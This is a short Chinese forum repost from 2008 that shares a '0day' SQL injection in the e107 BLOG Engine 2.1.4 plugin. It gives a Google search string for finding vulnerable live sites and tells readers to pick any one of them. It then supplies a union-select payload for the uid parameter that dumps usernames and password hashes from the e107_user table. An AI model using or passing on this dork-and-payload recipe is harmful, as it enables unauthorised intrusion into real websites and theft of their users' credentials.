首页 网络安全 安全学院 查看内容

网站0day分享--e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj

2008-11-3 09:08 679 0

摘要:   转载请注明:天阳网络技术联盟 http://bbs.tian6.com  其实这个洞是幻影发的。。。。。  这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remo...
关键词: 天阳 clipboard 先用 user 技术联盟 Copy CODE char 幻影 macgurublog

  转载请注明:天阳网络技术联盟 http://bbs.tian6.com  其实这个洞是幻影发的。。。。。  这次给大家带来的是 e107 Plugin BLOG Engine 2.1.4 Remote SQL Inj PHP远程注入漏洞,非常的简单。  首先用GOOGLE搜索:  [Copy to clipboard] [ - ]CODE:  allinurl:"macgurublog.php?uid="  在里面随便选择一个站,打开后在UID=后输入:  [Copy to clipboard] [ - ]CODE:  -1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部